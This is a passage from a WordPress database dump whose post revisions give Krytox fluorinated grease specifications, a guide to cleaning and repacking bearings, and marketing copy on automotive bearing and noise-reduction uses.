2008</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-011</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-012</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-013</td>\r\n</tr>\r\n<tr>\r\n<td>Grease Type/Operating Range, °C (°F)</td>\r\n<td style="text-align: center;" width="206">Type I/–54 to 149\r\n(–65 to 300)</td>\r\n<td style="text-align: center;" width="206">Type II/–40 to 204\r\n(–40 to 399)</td>\r\n<td style="text-align: center;" width="206">Type III/–34 to 288\r\n(–29 to 550)</td>\r\n</tr>\r\n<tr>\r\n<td>NATO Number</td>\r\n<td style="text-align: center;">G-397</td>\r\n<td style="text-align: center;">G-398</td>\r\n<td style="text-align: center;">G-399</td>\r\n</tr>\r\n<tr>\r\n<td>Penetration Grade</td>\r\n<td style="text-align: center;">NLGI 1</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n</tr>\r\n<tr>\r\n<td>Change in Worked Penetration (30 max.)</td>\r\n<td style="text-align: center;">13</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">–3</td>\r\n</tr>\r\n<tr>\r\n<td>Corrosion on Copper (2b max.)</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n</tr>\r\n<tr>\r\n<td width="250">High Temperature Bearing Performance\r\n(500 hr min. at 10,000 RPM, 204 °C [399 °F])</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">Stopped at 1,320 hr</td>\r\n<td style="text-align: center;">Stopped at 1,685 hr</td>\r\n</tr>\r\n<tr>\r\n<td>Evaporation ASTM D-2595, %</td>\r\n<td style="text-align: center;">12.9</td>\r\n<td style="text-align: center;">10.1</td>\r\n<td style="text-align: center;">0.2</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Separation, %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">14.2</td>\r\n<td style="text-align: center;">15.5</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Fuel (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.3</td>\r\n<td style="text-align: center;">0.1</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;" width="250">Liquid Oxygen Impact Sensitivity\r\n20 impacts at 43.3 in, no reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Water Washout Characteristics (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.25</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td>Oxidation Stability (5 max.), psi</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.5</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Dirt Count\r\n75 μ and larger (0 per cc max.)\r\n25 to 74 μ (1000 per cc max.)</td>\r\n<td style="text-align: center;">0/26</td>\r\n<td style="text-align: center;">0/0</td>\r\n<td style="text-align: center;">0/0</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Resistance to Aqueous Solution\r\nDistilled Water\r\n50/50 Distilled Water/Ethanol</td>\r\n<td width="206">\r\n<p style="text-align: center;">Pass\r\nPass</p>\r\n</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n</tr>\r\n<tr>\r\n<td>Film Stability and Corrosion on Steel</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Base Oil Viscosity, 40 °C (104 °F), cSt</td>\r\n<td style="text-align: center;">22.8</td>\r\n<td style="text-align: center;">77.8</td>\r\n<td style="text-align: center;">243</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Useful Range, °C</td>\r\n<td style="text-align: center;">–57 to 149</td>\r\n<td style="text-align: center;">–40 to 232</td>\r\n<td style="text-align: center;">–34 to 288</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/krytox/">If these greases are not right for you, please click here to learn more about Krytox greases and oils.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox™ MIL PRF-27617 Greases—Grease, Aircraft and Instrument, Fuel- and Oxidizer-Resistant', '', 'inherit', 'closed', 'closed', '', '2552-revision-v1', '', '', '2016-10-12 19:12:36', '2016-10-12 19:12:36', '', 2552, 'https://www.miller-stephenson.com/2552-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2572, 65, '2016-10-12 19:20:56', '2016-10-12 19:20:56', '', '', '', 'publish', 'closed', 'closed', '', '2572', '', '', '2016-10-12 19:20:56', '2016-10-12 19:20:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/2572/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2573, 2, '2016-10-12 19:30:24', '2016-10-12 19:30:24', '<h1>How to prepare a bearing with Krytox™ Lubricants</h1>\r\n<h4><strong>Before You Start</strong></h4>\r\nDirt is one of a bearing’s worst enemies. That’s why it is so important to work in a clean area, with bearings and lubricants covered until ready for use. When handling bearings, wear clean elastomer gloves and use clean, lint-free rags. Compressed air, if used, should be filtered and dried. Do not spin a bearing with compressed air. Even though a bearing might not have grease or oil in it, it will have anti-rust preservatives that will prevent proper adhesion of Krytox™ lubricant, and the preservatives must be removed before filling the bearing. This guide explains how to prepare bearings with Krytox™ Lubricants.\r\n\r\nBefore adding Krytox™ grease to a bearing, the bearing should be cleaned of all existing greases, oils, or preservative oils used to protect it during storage. If left in the bearing, these hydrocarbon oils can form carbon\r\ndeposits at higher temperatures that may accelerate bearing failure.\r\n<h4><strong>1. Cleaning</strong></h4>\r\na. Remove the seal by carefully prying between it and the inner ring. Care should be taken to prevent the prying tool from coming in contact with any race pathway, the cage, or the rolling elements of the bearing. Shields normally cannot be removed from a bearing without causing damage; so, they are typically not good candidates for a lubricant change.\r\nb. Place the bearings in a clean wire basket and suspend the basket in a container of clean solvent. The solvent should be the type that dissolves or breaks down the particular type of lubricant in the bearing. Chlorinated solvents should be avoided, because they can leave chlorine that can cause corrosion. Fluorinated solvents are not required for hydrocarbon lubricants.\r\n\r\nc. The parts should be agitated in a bath or have the cleaning fluid pumped through the bearing to increase cleaning performance. An ultrasonic cleaner can also be used. If the parts cleaner is heated, the temperature should be maintained below the flash point of the solvent. Do not allow the solvent to get too contaminated, as cleaning effectiveness will be reduced.\r\n\r\nd. Dry the bearings by circulating warm air through the bearing or by heating to 93.3 °C (200 °F) for 10 minutes. Allow to cool to room temperature. The metal must be completely dry of all solvents, or the grease might not adhere properly and could cause the bearing to fail prematurely. Volatile solvents can also be used as a final rinse to remove heavier solvents, for speed drying, and to ensure the bearing is completely clean.\r\nHowever, volatile solvents are more flammable; so, caution must be used when handling them.\r\n\r\nAfter the bearing surfaces are clean, they should be lubricated/wiped with Krytox™ lubricant and properly stored to prevent corrosion. If they are not going to be packed with Krytox lubricant immediately, or if they are\r\ngoing to be in storage for an extended period, they can be dipped in Krytox™ ACW to coat the surface and protect against rust.\r\n<h4><strong>2. Repacking</strong></h4>\r\na. Cleaned bearings should be lubricated immediately with the specified lubricant. Rolling elements may be pre-lubricated with Krytox™ oil that has the same viscosity as the base oil in the grease. Lubricate each\r\nrolling element with a drop of oil and slowly rotate with a slight thrust by hand, so that the elements rotate to evenly spread the oil.\r\n\r\nb. The correct amount of grease should be weighed on a gram balance and transferred to a clean syringe. Remember that the specific gravity of Krytox™ grease is about 2.0 mg/L, and fill by volume rather than by weight.\r\n\r\nc. Once the syringe is packed with the correct amount of lubricant, inject half of the grease equally in each of the cavities between the rolling elements, from one side of the bearing. Repeat, using the remaining grease on the other side of the bearing.\r\n\r\nd. Rotate the bearing slowly by hand to spread and distribute the lubricant. Enough thrust should be applied by hand to cause the rolling elements to rotate.\r\n\r\ne. Replace seals or shields carefully to avoid causing damage that would allow the grease to leak out prematurely.\r\n<h4><strong>How much grease to put in a bearing?</strong></h4>\r\nProper lubrication is achieved by using the correct amount of grease. Too little grease in the bearings causes premature failure. Too much grease at the initial fill or during re-lubrication can cause overheating of bearings that are running at medium to high speed, resulting in bearing failure. The amount of grease put in the bearing depends on the application and operating speed.\r\n<ul>\r\n 	<li>For applications such as conveyor rollers and lowspeed machinery with DN values (inner race ID in mm x rpm) below 50,000, the bearing can be filled to about 60–75% of the free volume.</li>\r\n 	<li>For medium-speed applications, i.e., DN 50,000 to 200,000, the bearing can be filled 35–50%.</li>\r\n 	<li>For higher-speed systems, the fill is typically 25–35%.</li>\r\n 	<li>Some extreme-speed special applications have grease fills of only 10–15% (see Speed Factor for definition of DN values).</li>\r\n</ul>\r\nBecause Krytox™ grease is heavier than hydrocarbon lubricants, its higher density must be considered when determining the fill quantity by weight. Consult your bearing manufacturer for the capacity of the specific\r\nbearing you are using.\r\n\r\nTo ensure that another type of grease is not accidentally put into the bearing, grease fittings should be changed to a different style, such as button-head or pin type. A dedicated grease gun that matches the fitting should be used.\r\n<h4><strong>Speed Factor</strong></h4>\r\nThe speed factor (DN) indicates the permissible speed range for grease in a rolling bearing. The DN value is the inner race i.d. in millimeters multiplied by the RPM. DN values of 100,000 to 400,000 and higher have been achieved at temperatures of 204 °C to 260 °C (400°F to 500 °F) in actual field service using Krytox™ greases. At very high speeds, a special break-in run might be needed to spread the grease to avoid overheating.\r\n\r\nThe speed factor is affected by the base oil type, in addition to viscosity and thickener type, and is a measure of the lubricant’s internal friction. The limiting speed for grease-lubricated rolling bearings is dependent\r\non the type of bearing, its load, speed, precision, and lubrication system.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox/">For help with applications please click here.</a>', 'How to Prepare Bearings with Krytox™ Lubricants', '', 'inherit', 'closed', 'closed', '', '2507-revision-v1', '', '', '2016-10-12 19:30:24', '2016-10-12 19:30:24', '', 2507, 'https://www.miller-stephenson.com/2507-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2574, 2, '2016-10-12 19:30:43', '2016-10-12 19:30:43', '<h1>How to prepare a bearing with Krytox™ Lubricants</h1>\r\n<h4><strong>Before You Start</strong></h4>\r\nDirt is one of a bearing’s worst enemies. That’s why it is so important to work in a clean area, with bearings and lubricants covered until ready for use. When handling bearings, wear clean elastomer gloves and use clean, lint-free rags. Compressed air, if used, should be filtered and dried. Do not spin a bearing with compressed air. Even though a bearing might not have grease or oil in it, it will have anti-rust preservatives that will prevent proper adhesion of Krytox™ lubricant, and the preservatives must be removed before filling the bearing. This guide explains how to prepare bearings with Krytox™ Lubricants.\r\n\r\nBefore adding Krytox™ grease to a bearing, the bearing should be cleaned of all existing greases, oils, or preservative oils used to protect it during storage. If left in the bearing, these hydrocarbon oils can form carbon\r\ndeposits at higher temperatures that may accelerate bearing failure.\r\n<h4><strong>1. Cleaning</strong></h4>\r\na. Remove the seal by carefully prying between it and the inner ring. Care should be taken to prevent the prying tool from coming in contact with any race pathway, the cage, or the rolling elements of the bearing. Shields normally cannot be removed from a bearing without causing damage; so, they are typically not good candidates for a lubricant change.\r\nb. Place the bearings in a clean wire basket and suspend the basket in a container of clean solvent. The solvent should be the type that dissolves or breaks down the particular type of lubricant in the bearing. Chlorinated solvents should be avoided, because they can leave chlorine that can cause corrosion. Fluorinated solvents are not required for hydrocarbon lubricants.\r\n\r\nc. The parts should be agitated in a bath or have the cleaning fluid pumped through the bearing to increase cleaning performance. An ultrasonic cleaner can also be used. If the parts cleaner is heated, the temperature should be maintained below the flash point of the solvent. Do not allow the solvent to get too contaminated, as cleaning effectiveness will be reduced.\r\n\r\nd. Dry the bearings by circulating warm air through the bearing or by heating to 93.3 °C (200 °F) for 10 minutes. Allow to cool to room temperature. The metal must be completely dry of all solvents, or the grease might not adhere properly and could cause the bearing to fail prematurely. Volatile solvents can also be used as a final rinse to remove heavier solvents, for speed drying, and to ensure the bearing is completely clean.\r\nHowever, volatile solvents are more flammable; so, caution must be used when handling them.\r\n\r\nAfter the bearing surfaces are clean, they should be lubricated/wiped with Krytox™ lubricant and properly stored to prevent corrosion. If they are not going to be packed with Krytox lubricant immediately, or if they are\r\ngoing to be in storage for an extended period, they can be dipped in Krytox™ ACW to coat the surface and protect against rust.\r\n<h4><strong>2. Repacking</strong></h4>\r\na. Cleaned bearings should be lubricated immediately with the specified lubricant. Rolling elements may be pre-lubricated with Krytox™ oil that has the same viscosity as the base oil in the grease. Lubricate each\r\nrolling element with a drop of oil and slowly rotate with a slight thrust by hand, so that the elements rotate to evenly spread the oil.\r\n\r\nb. The correct amount of grease should be weighed on a gram balance and transferred to a clean syringe. Remember that the specific gravity of Krytox™ grease is about 2.0 mg/L, and fill by volume rather than by weight.\r\n\r\nc. Once the syringe is packed with the correct amount of lubricant, inject half of the grease equally in each of the cavities between the rolling elements, from one side of the bearing. Repeat, using the remaining grease on the other side of the bearing.\r\n\r\nd. Rotate the bearing slowly by hand to spread and distribute the lubricant. Enough thrust should be applied by hand to cause the rolling elements to rotate.\r\n\r\ne. Replace seals or shields carefully to avoid causing damage that would allow the grease to leak out prematurely.\r\n<h4><strong>How much grease to put in a bearing?</strong></h4>\r\nProper lubrication is achieved by using the correct amount of grease. Too little grease in the bearings causes premature failure. Too much grease at the initial fill or during re-lubrication can cause overheating of bearings that are running at medium to high speed, resulting in bearing failure. The amount of grease put in the bearing depends on the application and operating speed.\r\n<ul>\r\n 	<li>For applications such as conveyor rollers and lowspeed machinery with DN values (inner race ID in mm x rpm) below 50,000, the bearing can be filled to about 60–75% of the free volume.</li>\r\n 	<li>For medium-speed applications, i.e., DN 50,000 to 200,000, the bearing can be filled 35–50%.</li>\r\n 	<li>For higher-speed systems, the fill is typically 25–35%.</li>\r\n 	<li>Some extreme-speed special applications have grease fills of only 10–15% (see Speed Factor for definition of DN values).</li>\r\n</ul>\r\nBecause Krytox™ grease is heavier than hydrocarbon lubricants, its higher density must be considered when determining the fill quantity by weight. Consult your bearing manufacturer for the capacity of the specific\r\nbearing you are using.\r\n\r\nTo ensure that another type of grease is not accidentally put into the bearing, grease fittings should be changed to a different style, such as button-head or pin type. A dedicated grease gun that matches the fitting should be used.\r\n<h4><strong>Speed Factor</strong></h4>\r\nThe speed factor (DN) indicates the permissible speed range for grease in a rolling bearing. The DN value is the inner race i.d. in millimeters multiplied by the RPM. DN values of 100,000 to 400,000 and higher have been achieved at temperatures of 204 °C to 260 °C (400°F to 500 °F) in actual field service using Krytox™ greases. At very high speeds, a special break-in run might be needed to spread the grease to avoid overheating.\r\n\r\nThe speed factor is affected by the base oil type, in addition to viscosity and thickener type, and is a measure of the lubricant’s internal friction. The limiting speed for grease-lubricated rolling bearings is dependent\r\non the type of bearing, its load, speed, precision, and lubrication system.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox/">For help with applications please click here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'How to Prepare Bearings with Krytox™ Lubricants', '', 'inherit', 'closed', 'closed', '', '2507-revision-v1', '', '', '2016-10-12 19:30:43', '2016-10-12 19:30:43', '', 2507, 'https://www.miller-stephenson.com/2507-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2575, 2, '2016-10-12 19:31:41', '2016-10-12 19:31:41', '<h1><strong>Krytox™ Automotive Bearing Lubrication Applications</strong></h1>\r\n<h4><strong>High Performance Lubricants That Work in Demanding Real-Life Applications</strong></h4>\r\nReliable high-performance fluoropolymer lubricants from Chemours can stand up to even extreme conditions. Krytox™ oils and greases have proven scientific and technical properties to help solve the most critical issues in the automotive industry. Superior product performance, lower overall maintenance systems cost, and a lower environmental footprint help to meet rising consumer expectations. For automotive manufacturers, this provides the opportunity to offer extended warranties and enjoy improved productivity through reduced component failure.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">Krytox™ oils and greases</a> are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 288°C (550 °F), and higher temperatures for shorter periods, depending on product grade limits. Krytox™ oils and greases are exceptionally safe, reliable, and offer environmental benefits as well as longer lubricant life. These oils and greases will not burn or support combustion, even in 100% liquid or gaseous oxygen, nor will they degrade or break down in the presence of aggressive chemicals. In automotive applications, Krytox™ oils and greases deliver low\r\ntemperature starting performance, while maintaining efficacy at higher temperatures. These oils and greases can increase service life of critical components, allowing them to run more quietly and last longer, for superior, reliable performance.\r\n<table width="662">\r\n<tbody>\r\n<tr>\r\n<td width="250"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™ Oils and Greases</a></td>\r\n<td style="text-align: center;" width="206">Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Temperature Range, °C (°F)</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">GPL 204</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">GPL 214</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">GPL 224</a>, GPL 294, GPL 2E4, <a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">XP2A4</a></td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">–51–179 (–60–354)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">AUT 2E45, AUT 2245, AUT 2045, AUT 2A45</a></td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">–40–200 (–40–392)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">GPL 205</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">GPL 215</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">GPL 225</a>, GPL 295, GPL 2E5, <a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">XP2A5</a></td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">–36–210 (–33–410)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Krytox™—Products for the Automotive Industry</strong></h4>\r\nSeveral grades of Krytox™ oil and grease are suitable for automotive use, depending on the application type and temperature range encountered. The table above lists the most common grades currently being used. More detailed data is available on the web at <a href="https://www.miller-stephenson.com/krytox/">www.miller-stephenson.com/krytox.</a> <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">Solutions for automotive industries can be found by clicking here.</a>\r\n\r\n<img class="size-medium wp-image-2504 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-bearing-lubrication-800x465.jpg" alt="automotive-bearing-lubrication" width="800" height="465" />\r\n\r\n<strong>Proven Applications</strong>\r\n\r\n<strong>Fan Clutch</strong>\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and high viscosity, providing long life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\n<strong>Alternator</strong>\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators and, hence, the bearings get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure. As the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation. This reduces the alternator’s performance and robs performance from the rest of the automobile. Perhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running.\r\n\r\nThe higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced and reliable, heat-stability and performance of Krytox™ greases.\r\n<h4><strong>Clutch Pilot Automotive Bearing</strong></h4>\r\nThe pilot bearings support the clutch-end of the transmission shaft. If the lubricant in the pilot bearing fails, the transmission itself will fail. Pilot bearings lubricated with Krytox™ high performance lubricants will last longer and perform better than those lubricated with other synthetic lubricants, due to the high-load capability and chemical inertness of Krytox™ products.\r\n<h4><strong>Cooling Fan</strong></h4>\r\nTo maximize performance, an automobile’s engine must run at its optimal temperature (typically around 93 °C [200 °F]), which is controlled by the cooling system. One component of the system is the cooling fan, which blows air through the radiator, removing excess heat. Failure in the cooling fan’s bearings leads to failure of the fan, which will eventually result in overheating of the engine. The sintered bearings used in cooling fans often fail in two ways: either the lubricant volatilizes, or it degrades through oxidation. The use of Krytox™ prevents both of these modes of failure, due to its low volatility and unsurpassed resistance to oxidation.\r\n<h4><strong>Heavy Duty Truck Automatic Clutch</strong></h4>\r\nIn many heavy duty trucks, the engines have a much lower rpm upper limit. In order to prevent the engine from being destroyed, an automatic clutch is used. When the set maximum rpm limit is reached, the automatic clutch disengages and notifies the driver to shift gears. This both prevents engine damage and increases ease of operation. The bearings present in the clutch are critical to its operation and must receive adequate lubrication in order to work properly. Lubricating with Krytox™ mid-range viscosity and low volatility lubricants reduces the chance that the bearings will fail with the frequent gear-shifting and high loads experienced throughout the extended driving life of these trucks.\r\n\r\nTo learn more about Krytox Automotive Non Bearing lubrication applications please <a href="https://www.miller-stephenson.com/krytox-automotive/">click here.</a>', 'Krytox™ Automotive Bearing Lubrication Applications', '', 'inherit', 'closed', 'closed', '', '2503-revision-v1', '', '', '2016-10-12 19:31:41', '2016-10-12 19:31:41', '', 2503, 'https://www.miller-stephenson.com/2503-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2576, 2, '2016-10-12 19:32:18', '2016-10-12 19:32:18', '<strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> Lubricants Can Help Solve Your Automotive Noise, Vibration, and Harshness issues.</strong>\r\n\r\nInside an automobile’s interior, there are a variety of places where different materials come into contact with one another. Examples include metal on plastic, leather on leather, weather stripping, and many others. Movement between these surfaces often results in a series of noises typically described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises with just a small amount of lubricant at the interface.\r\n\r\nBecause these applications are intended to be a one-time application, it is important to choose a lubricant that is easy to apply, has low volatility, and will remain in place over the normal useful life of the vehicle. Krytox™ oils and greases are the answer.\r\n\r\nKrytox™ oils and greases stand up to harsh environments and high temperatures to lubricate weather stripping and parts prone to noise and wear. Krytox™ prevents weather stripping from cracking, shrinking, and swelling to help reduce wind noise, drafts, and water leakage. And, when used on moving parts, Krytox™ lubricants can minimize the shock and stress that cause squeaks, rattles, and damage.\r\n\r\nKrytox™ oils and greases are compatible with a wide variety of materials, and they have the frictional and long life characteristics that make them ideal lubricants in noise, vibration, and harshness applications.\r\n\r\n<strong>Oils and Greases That Really Work in Demanding Real-Life Applications</strong>\r\n\r\nReliable high-performance fluoropolymer lubricants from Chemours can prevent unwanted noises without relubrication. Krytox™ oils and greases are easy to apply, have low volatility, and are long-lasting in aggressive environments.\r\n\r\nKrytox™ Value\r\n<ul>\r\n 	<li>Long-lasting, cost effective lubrication— Krytox™ prevents unwanted noises without re-lubrication. And, Krytox™ stays put, so you can apply a small amount without fear of migration.</li>\r\n 	<li>Material compatibility—Because Krytox™ is compatible with metals, elastomers, and engineering plastics, it won’t damage the components, allowing them to last as designed. • Chemical compatibility and environmental safety—Krytox™ lubricants are chemically, biologically, and environmentally inert, as well as silicone-free. And, they contain no hazardous volatile organic compound materials or chlorine.</li>\r\n 	<li>Lubricity—Krytox™ provides excellent lubricity because of its low coefficient of friction and low surface energy; and because it doesn’t oxidize, it won’t turn sticky or change color.</li>\r\n</ul>\r\n<strong>Application Guidance</strong>\r\n\r\nThe typical coverage for Krytox™ when properly applied is approximately 4 g/m2. Most applications are less than 0.2 g. Each application must be considered separately in order to ensure the best solution is found. There are two main components of any application method:\r\n<ol>\r\n 	<li>Controlled metering of the material from the container to the applicator. This is best done automatically to ensure accuracy and repeatability.</li>\r\n 	<li>Transfer of the material from the applicator to the component. This can be either a manual application, using a brush or foam applicator, or automatically—either by spraying or wiping by robot or specially designed jig.</li>\r\n</ol>\r\n<strong>Application Examples</strong>\r\n\r\nAutomakers from around the world have a long history of using Krytox™ oils and greases to help eliminate automotive squeaks and rattles.\r\n\r\nHere are just a few of the many pain points Krytox™ has been proven to help silence:\r\n<ul>\r\n 	<li>Leather trim, seats, and console parts—Leather-onleather friction can create an irritating noise. Krytox™ gets rid of the itch without staining the leather or becoming sticky over time.</li>\r\n 	<li>Plastic door panel and metal frame—Because Krytox™ is compatible with metals, elastomers, and plastics, it effectively silences noise caused by the interaction of various materials. And, Krytox™ won’t oxidize or discolor plastic. Apply by spraying by hand or using a robot.</li>\r\n 	<li>Rubber gaskets and seals—A thin film of Krytox™ can lubricate sliding contact in convertible tops, sunroofs, trunk lids, and doors to keep the rubber compound in good condition, and protected from oxidation. Grease or oil can be applied by hand, or a jig can be used to guide the application.</li>\r\n 	<li>Window lift systems and weather stripping—Krytox™ can stop weather strip “bunching” and “gathering,” and help eliminate the wind noise produced as window glass is raised. Awkward configuration\r\nof these seals usually means that automatic application is difficult. An automatic dispenser in conjunction with disposable foam applicators is often used. The amount can be controlled by ensuring a preset quantity is dispensed directly from the supply onto the applicator.</li>\r\n</ul>\r\n<img class="alignnone size-medium wp-image-2452" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/noise-vibration-harshness-800x455.jpg" alt="noise-vibration-harshness" width="800" height="455" />\r\n\r\n<strong>Application Systems</strong>\r\n\r\nThere are several manufacturers of equipment that can be used for these applications. The systems can be purchased from one source or fabricated locally from many sources. Automatic dispensing systems for adhesives, sealants, or lubricants can be used as the supply system. Manufacturers such as GRACO, Hydrotech, LCC-Dispensit, or a local distributor can provide controlled application systems for precise dispensing.\r\n\r\nUse of disposable foam tips or brushes can allow accurate coverage of most shapes. Companies such as Designetics or others can provide help in this area.\r\n\r\nChoose Krytox™ for long-lasting lubrication that helps improve vehicle performance and customer satisfaction.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—performance lubricants from Chemours can help. At Chemours, we put our science to work to produce lubricants that can stand up to today’s engineering design demands—no matter how tough the conditions. It’s reliability you can count on, from a name you trust.\r\n\r\n[ux_product_categories ids="46,37,45" number="10"]', 'Krytox™ For Automotive Noise, Vibration, and Harshness', '', 'inherit', 'closed', 'closed', '', '2450-revision-v1', '', '', '2016-10-12 19:32:18', '2016-10-12 19:32:18', '', 2450, 'https://www.miller-stephenson.com/2450-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2577, 2, '2016-10-12 19:32:30', '2016-10-12 19:32:30', '<strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> Lubricants Can Help Solve Your Automotive Noise, Vibration, and Harshness issues.</strong>\r\n\r\nInside an automobile’s interior, there are a variety of places where different materials come into contact with one another. Examples include metal on plastic, leather on leather, weather stripping, and many others. Movement between these surfaces often results in a series of noises typically described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises with just a small amount of lubricant at the interface.\r\n\r\nBecause these applications are intended to be a one-time application, it is important to choose a lubricant that is easy to apply, has low volatility, and will remain in place over the normal useful life of the vehicle. Krytox™ oils and greases are the answer.\r\n\r\nKrytox™ oils and greases stand up to harsh environments and high temperatures to lubricate weather stripping and parts prone to noise and wear. Krytox™ prevents weather stripping from cracking, shrinking, and swelling to help reduce wind noise, drafts, and water leakage. And, when used on moving parts, Krytox™ lubricants can minimize the shock and stress that cause squeaks, rattles, and damage.\r\n\r\nKrytox™ oils and greases are compatible with a wide variety of materials, and they have the frictional and long life characteristics that make them ideal lubricants in noise, vibration, and harshness applications.\r\n\r\n<strong>Oils and Greases That Really Work in Demanding Real-Life Applications</strong>\r\n\r\nReliable high-performance fluoropolymer lubricants from Chemours can prevent unwanted noises without relubrication. Krytox™ oils and greases are easy to apply, have low volatility, and are long-lasting in aggressive environments.\r\n\r\nKrytox™ Value\r\n<ul>\r\n 	<li>Long-lasting, cost effective lubrication— Krytox™ prevents unwanted noises without re-lubrication. And, Krytox™ stays put, so you can apply a small amount without fear of migration.</li>\r\n 	<li>Material compatibility—Because Krytox™ is compatible with metals, elastomers, and engineering plastics, it won’t damage the components, allowing them to last as designed. • Chemical compatibility and environmental safety—Krytox™ lubricants are chemically, biologically, and environmentally inert, as well as silicone-free. And, they contain no hazardous volatile organic compound materials or chlorine.</li>\r\n 	<li>Lubricity—Krytox™ provides excellent lubricity because of its low coefficient of friction and low surface energy; and because it doesn’t oxidize, it won’t turn sticky or change color.</li>\r\n</ul>\r\n<strong>Application Guidance</strong>\r\n\r\nThe typical coverage for Krytox™ when properly applied is approximately 4 g/m2. Most applications are less than 0.2 g. Each application must be considered separately in order to ensure the best solution is found. There are two main components of any application method:\r\n<ol>\r\n 	<li>Controlled metering of the material from the container to the applicator. This is best done automatically to ensure accuracy and repeatability.</li>\r\n 	<li>Transfer of the material from the applicator to the component. This can be either a manual application, using a brush or foam applicator, or automatically—either by spraying or wiping by robot or specially designed jig.</li>\r\n</ol>\r\n<strong>Application Examples</strong>\r\n\r\nAutomakers from around the world have a long history of using Krytox™ oils and greases to help eliminate automotive squeaks and rattles.\r\n\r\nHere are just a few of the many pain points Krytox™ has been proven to help silence:\r\n<ul>\r\n 	<li>Leather trim, seats, and console parts—Leather-onleather friction can create an irritating noise. Krytox™ gets rid of the itch without staining the leather or becoming 